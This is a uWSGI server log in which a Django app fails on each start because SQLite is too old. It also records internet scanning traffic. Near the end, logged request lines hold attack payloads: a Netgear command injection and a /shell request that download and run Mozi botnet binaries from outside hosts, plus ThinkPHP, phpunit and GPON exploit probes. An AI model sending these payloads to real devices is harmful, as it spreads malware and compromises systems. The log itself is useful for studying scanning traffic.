*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan  1 23:08:28 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0xd05040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
Traceback (most recent call last):
  File "./django_project/wsgi.py", line 16, in <module>
    application = get_wsgi_application()
  File "/usr/local/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/usr/local/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/usr/local/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/usr/local/lib64/python3.6/site-packages/django/apps/config.py", line 211, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 2, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/options.py", line 206, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/usr/local/lib64/python3.6/site-packages/django/db/__init__.py", line 28, in __getattr__
    return getattr(connections[DEFAULT_DB_ALIAS], item)
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 214, in __getitem__
    backend = load_backend(db['ENGINE'])
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 70, in <module>
    check_sqlite_version()
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 67, in check_sqlite_version
    raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' % Database.sqlite_version)
django.core.exceptions.ImproperlyConfigured: SQLite 3.8.3 or later is required (found 3.7.17).
unable to load app 0 (mountpoint='') (callable not found or import error)
*** no app loaded. going in full dynamic mode ***
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 17247)
spawned uWSGI worker 1 (pid: 17249, cores: 2)
spawned uWSGI worker 2 (pid: 17250, cores: 2)
spawned uWSGI worker 3 (pid: 17253, cores: 2)
spawned uWSGI worker 4 (pid: 17254, cores: 2)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/1] 223.73.88.154 () {42 vars in 744 bytes} [Fri Jan  1 23:08:34 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/2] 223.73.88.154 () {42 vars in 684 bytes} [Fri Jan  1 23:08:35 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/3] 223.73.88.154 () {42 vars in 754 bytes} [Fri Jan  1 23:08:44 2021] GET /video => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17254|app: -1|req: -1/4] 223.73.88.154 () {42 vars in 689 bytes} [Fri Jan  1 23:08:44 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan  1 23:13:38 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
probably another instance of uWSGI is running on the same address (127.0.0.1:8001).
bind(): Address already in use [core/socket.c line 769]
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/5] 223.73.88.154 () {44 vars in 785 bytes} [Fri Jan  1 23:13:44 2021] GET /video => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/6] 223.73.88.154 () {46 vars in 742 bytes} [Fri Jan  1 23:13:44 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/7] 223.73.88.154 () {42 vars in 744 bytes} [Fri Jan  1 23:15:56 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 17253|app: -1|req: -1/8] 223.73.88.154 () {42 vars in 684 bytes} [Fri Jan  1 23:15:56 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan  1 23:17:34 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0x122a060
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
Traceback (most recent call last):
  File "./django_project/wsgi.py", line 16, in <module>
    application = get_wsgi_application()
  File "/usr/local/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/usr/local/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/usr/local/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/usr/local/lib64/python3.6/site-packages/django/apps/config.py", line 211, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 2, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/options.py", line 206, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/usr/local/lib64/python3.6/site-packages/django/db/__init__.py", line 28, in __getattr__
    return getattr(connections[DEFAULT_DB_ALIAS], item)
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 214, in __getitem__
    backend = load_backend(db['ENGINE'])
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 70, in <module>
    check_sqlite_version()
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 67, in check_sqlite_version
    raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' % Database.sqlite_version)
django.core.exceptions.ImproperlyConfigured: SQLite 3.8.3 or later is required (found 3.7.17).
unable to load app 0 (mountpoint='') (callable not found or import error)
*** no app loaded. going in full dynamic mode ***
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 18492)
spawned uWSGI worker 1 (pid: 18494, cores: 2)
spawned uWSGI worker 2 (pid: 18495, cores: 2)
spawned uWSGI worker 3 (pid: 18496, cores: 2)
spawned uWSGI worker 4 (pid: 18497, cores: 2)
--- no python application found, check your startup logs for errors ---
[pid: 18497|app: -1|req: -1/1] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:18:47 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18497|app: -1|req: -1/2] 223.73.88.154 () {46 vars in 737 bytes} [Fri Jan  1 23:18:47 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18497|app: -1|req: -1/3] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:18:49 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18496|app: -1|req: -1/4] 223.73.88.154 () {46 vars in 737 bytes} [Fri Jan  1 23:18:49 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18495|app: -1|req: -1/5] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:18:49 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18497|app: -1|req: -1/6] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:18:50 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18494|app: -1|req: -1/7] 223.73.88.154 () {46 vars in 737 bytes} [Fri Jan  1 23:18:50 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18497|app: -1|req: -1/8] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:19:01 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 18496|app: -1|req: -1/9] 223.73.88.154 () {46 vars in 737 bytes} [Fri Jan  1 23:19:02 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan  1 23:45:34 2021] ***
compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 01 January 2021 06:37:29
os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
nodename: VM-8-16-centos
machine: x86_64
clock source: unix
pcre jit disabled
detected number of CPU cores: 1
current working directory: /home/jerome/git/django_project
writing pidfile to ./uwsgi.pid
detected binary path: /usr/local/bin/uwsgi
chdir() to /home/jerome/git/django_project
your processes number limit is 7261
your memory page size is 4096 bytes
detected max file descriptor number: 100001
lock engine: pthread robust mutexes
thunder lock: disabled (you can enable it with --thunder-lock)
uwsgi socket 0 bound to TCP address 127.0.0.1:8001 fd 6
Python version: 3.6.8 (default, Nov 16 2020, 16:55:22)  [GCC 4.8.5 20150623 (Red Hat 4.8.5-44)]
Python main interpreter initialized at 0xe0b040
python threads support enabled
your server socket listen backlog is limited to 100 connections
your mercy for graceful operations on workers is 60 seconds
mapped 416880 bytes (407 KB) for 8 cores
*** Operational MODE: preforking+threaded ***
Traceback (most recent call last):
  File "./django_project/wsgi.py", line 16, in <module>
    application = get_wsgi_application()
  File "/usr/local/lib64/python3.6/site-packages/django/core/wsgi.py", line 12, in get_wsgi_application
    django.setup(set_prefix=False)
  File "/usr/local/lib64/python3.6/site-packages/django/__init__.py", line 24, in setup
    apps.populate(settings.INSTALLED_APPS)
  File "/usr/local/lib64/python3.6/site-packages/django/apps/registry.py", line 114, in populate
    app_config.import_models()
  File "/usr/local/lib64/python3.6/site-packages/django/apps/config.py", line 211, in import_models
    self.models_module = import_module(models_module_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/models.py", line 2, in <module>
    from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager
  File "/usr/local/lib64/python3.6/site-packages/django/contrib/auth/base_user.py", line 48, in <module>
    class AbstractBaseUser(models.Model):
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 122, in __new__
    new_class.add_to_class('_meta', Options(meta, app_label))
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/base.py", line 326, in add_to_class
    value.contribute_to_class(cls, name)
  File "/usr/local/lib64/python3.6/site-packages/django/db/models/options.py", line 206, in contribute_to_class
    self.db_table = truncate_name(self.db_table, connection.ops.max_name_length())
  File "/usr/local/lib64/python3.6/site-packages/django/db/__init__.py", line 28, in __getattr__
    return getattr(connections[DEFAULT_DB_ALIAS], item)
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 214, in __getitem__
    backend = load_backend(db['ENGINE'])
  File "/usr/local/lib64/python3.6/site-packages/django/db/utils.py", line 111, in load_backend
    return import_module('%s.base' % backend_name)
  File "/usr/lib64/python3.6/importlib/__init__.py", line 126, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 70, in <module>
    check_sqlite_version()
  File "/usr/local/lib64/python3.6/site-packages/django/db/backends/sqlite3/base.py", line 67, in check_sqlite_version
    raise ImproperlyConfigured('SQLite 3.8.3 or later is required (found %s).' % Database.sqlite_version)
django.core.exceptions.ImproperlyConfigured: SQLite 3.8.3 or later is required (found 3.7.17).
unable to load app 0 (mountpoint='') (callable not found or import error)
*** no app loaded. going in full dynamic mode ***
*** uWSGI is running in multiple interpreter mode ***
spawned uWSGI master process (pid: 22482)
spawned uWSGI worker 1 (pid: 22484, cores: 2)
spawned uWSGI worker 2 (pid: 22485, cores: 2)
spawned uWSGI worker 3 (pid: 22486, cores: 2)
spawned uWSGI worker 4 (pid: 22487, cores: 2)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/1] 223.73.88.154 () {42 vars in 744 bytes} [Fri Jan  1 23:45:47 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22485|app: -1|req: -1/2] 223.73.88.154 () {42 vars in 684 bytes} [Fri Jan  1 23:45:47 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/3] 223.73.88.154 () {44 vars in 775 bytes} [Fri Jan  1 23:45:50 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22487|app: -1|req: -1/4] 223.73.88.154 () {42 vars in 684 bytes} [Fri Jan  1 23:45:50 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/5] 127.0.0.1 () {32 vars in 346 bytes} [Fri Jan  1 23:46:13 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/6] 192.241.221.148 () {34 vars in 421 bytes} [Fri Jan  1 23:54:47 2021] GET /manager/html => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/7] 198.143.155.122 () {34 vars in 491 bytes} [Fri Jan  1 23:58:29 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/8] 78.134.51.31 () {32 vars in 464 bytes} [Sat Jan  2 00:31:33 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/9] 220.130.239.186 () {40 vars in 559 bytes} [Sat Jan  2 00:34:31 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/10] 220.130.239.186 () {40 vars in 559 bytes} [Sat Jan  2 00:34:32 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/11] 45.15.143.171 () {34 vars in 404 bytes} [Sat Jan  2 00:56:34 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/12] 223.73.88.154 () {42 vars in 684 bytes} [Sat Jan  2 01:00:55 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/13] 125.26.19.171 () {38 vars in 503 bytes} [Sat Jan  2 01:32:48 2021] POST /GponForm/diag_Form?images/ => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/14] 118.25.12.9 () {28 vars in 358 bytes} [Sat Jan  2 04:07:41 2021] GET /manager/html/ => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/15] 45.155.205.108 () {38 vars in 714 bytes} [Sat Jan  2 05:39:58 2021] POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22486|app: -1|req: -1/16] 45.155.205.108 () {36 vars in 626 bytes} [Sat Jan  2 05:39:58 2021] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/17] 45.155.205.108 () {34 vars in 722 bytes} [Sat Jan  2 05:39:59 2021] GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22485|app: -1|req: -1/18] 45.155.205.108 () {34 vars in 558 bytes} [Sat Jan  2 05:39:59 2021] GET /solr/admin/info/system?wt=json => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/19] 45.155.205.108 () {36 vars in 655 bytes} [Sat Jan  2 05:40:00 2021] GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22487|app: -1|req: -1/20] 45.155.205.108 () {34 vars in 558 bytes} [Sat Jan  2 05:40:00 2021] GET /?XDEBUG_SESSION_START=phpstorm => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/21] 45.155.205.108 () {34 vars in 589 bytes} [Sat Jan  2 05:40:01 2021] GET /wp-content/plugins/wp-file-manager/readme.txt => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/22] 45.155.205.108 () {38 vars in 612 bytes} [Sat Jan  2 05:40:01 2021] POST /api/jsonws/invoke => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/23] 45.155.205.108 () {34 vars in 515 bytes} [Sat Jan  2 05:40:01 2021] GET /console/ => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/24] 45.155.205.108 () {38 vars in 638 bytes} [Sat Jan  2 05:40:03 2021] POST /Autodiscover/Autodiscover.xml => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/25] 223.197.79.98 () {28 vars in 360 bytes} [Sat Jan  2 06:09:27 2021] GET /manager/html/ => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/26] 123.145.27.67 () {44 vars in 783 bytes} [Sat Jan  2 06:28:19 2021] HEAD / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/27] 192.241.214.108 () {34 vars in 425 bytes} [Sat Jan  2 06:35:49 2021] GET /portal/redlion => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/28] 109.196.155.203 () {26 vars in 603 bytes} [Sat Jan  2 07:55:27 2021] GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://109.196.155.203:49197/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/29] 59.59.41.229 () {34 vars in 642 bytes} [Sat Jan  2 08:48:06 2021] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/30] 203.170.193.86 () {28 vars in 361 bytes} [Sat Jan  2 08:51:24 2021] GET /manager/html/ => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/31] 80.82.70.187 () {32 vars in 434 bytes} [Sat Jan  2 09:12:29 2021] GET /cache/global/img/gs.gif => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/32] 179.111.124.101 () {32 vars in 474 bytes} [Sat Jan  2 09:58:02 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/33] 109.94.119.183 () {32 vars in 467 bytes} [Sat Jan  2 10:03:38 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/34] 183.136.225.45 () {34 vars in 461 bytes} [Sat Jan  2 10:18:01 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22487|app: -1|req: -1/35] 183.136.225.45 () {36 vars in 521 bytes} [Sat Jan  2 10:18:01 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22486|app: -1|req: -1/36] 183.136.225.45 () {36 vars in 543 bytes} [Sat Jan  2 10:18:01 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/37] 192.241.213.236 () {34 vars in 427 bytes} [Sat Jan  2 10:28:15 2021] GET /actuator/health => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/38] 1.196.79.220 () {32 vars in 487 bytes} [Sat Jan  2 10:46:06 2021] GET /phpmyadmin/ => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/39] 64.31.8.10 () {32 vars in 368 bytes} [Sat Jan  2 10:46:35 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/40] 175.184.164.169 () {44 vars in 785 bytes} [Sat Jan  2 10:46:37 2021] HEAD / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/41] 89.248.168.108 () {26 vars in 284 bytes} [Sat Jan  2 10:53:26 2021] HEAD / => generated 21 bytes in 0 msecs (HTTP/1.0 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/42] 103.107.77.4 () {32 vars in 465 bytes} [Sat Jan  2 12:22:27 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/43] 223.73.88.126 () {42 vars in 744 bytes} [Sat Jan  2 12:23:51 2021] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
[pid: 22484|app: -1|req: -1/44] 223.73.88.126 () {42 vars in 684 bytes} [Sat Jan  2 12:23:52 2021] GET /favicon.ico => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (0 switches on core 0)
--- no python application found, check your startup logs for errors ---
